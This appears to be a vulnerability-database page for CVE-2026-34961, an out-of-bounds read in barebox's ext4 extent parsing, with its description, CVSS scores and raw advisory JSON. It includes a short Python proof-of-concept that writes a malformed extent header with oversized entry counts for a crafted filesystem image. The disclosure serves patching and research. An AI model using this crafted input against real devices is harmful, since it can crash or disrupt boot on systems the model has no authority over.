Security Vulnerability Report
中文
CVE-2026-34961 CVSS 6.2 MEDIUM

CVE-2026-34961

Published: 2026-05-11 22:22:11
Last Modified: 2026-05-11 22:22:11
Source: [email protected]

Description

barebox prior to version 2026.04.0 contains out-of-bounds read vulnerabilities in ext4 extent parsing due to missing validation of the eh_entries field against buffer capacity in fs/ext4/ext4_common.c. Attackers can supply a malicious ext4 filesystem image via USB, SD card, or network boot to trigger heap out-of-bounds reads during boot-time filesystem parsing, potentially redirecting reads to arbitrary disk offsets.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

barebox < 2026.04.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct # This script generates a malicious ext4 extent header structure. # In a real exploit scenario, this structure would be embedded into a valid # ext4 filesystem image at the specific offset where barebox expects to parse extents. def create_malicious_extent_header(): # ext4 extent header structure: # __u16 eh_magic; // Magic number, 0xF30A # __u16 eh_entries; // Number of valid entries (MALICIOUS FIELD) # __u16 eh_max; // Capacity of the entries array # __u16 eh_depth; // Depth of this extent node # __u32 eh_generation; // Generation eh_magic = 0xF30A # Set eh_entries to a large value to trigger out-of-bounds read. # If the buffer capacity is smaller than 0xFFFF, this will cause an OOB read. eh_entries = 0xFFFF eh_max = 0xFFFF eh_depth = 0 eh_generation = 0 # Pack the structure into binary format (Little Endian) # Format: 2 unsigned short, 2 unsigned short, 1 unsigned int # Corresponds to: H (magic), H (entries), H (max), H (depth), I (generation) format_str = '<HHHHI' binary_data = struct.pack(format_str, eh_magic, eh_entries, eh_max, eh_depth, eh_generation) return binary_data if __name__ == "__main__": payload = create_malicious_extent_header() # Write the payload to a file for demonstration with open('malicious_extent.bin', 'wb') as f: f.write(payload) print("Generated malicious extent header with eh_entries = 0xFFFF") print("Payload saved to malicious_extent.bin")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34961", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:11.000", "lastModified": "2026-05-11T22:22:11.000", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "barebox prior to version 2026.04.0 contains out-of-bounds read vulnerabilities in ext4 extent parsing due to missing validation of the eh_entries field against buffer capacity in fs/ext4/ext4_common.c. Attackers can supply a malicious ext4 filesystem image via USB, SD card, or network boot to trigger heap out-of-bounds reads during boot-time filesystem parsing, potentially redirecting reads to arbitrary disk offsets."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://github.com/barebox/barebox", "source": "[email protected]"}, {"url": "https://github.com/barebox/barebox/releases/tag/v2026.04.0", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/barebox-ext4-extent-parsing-out-of-bounds-read", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.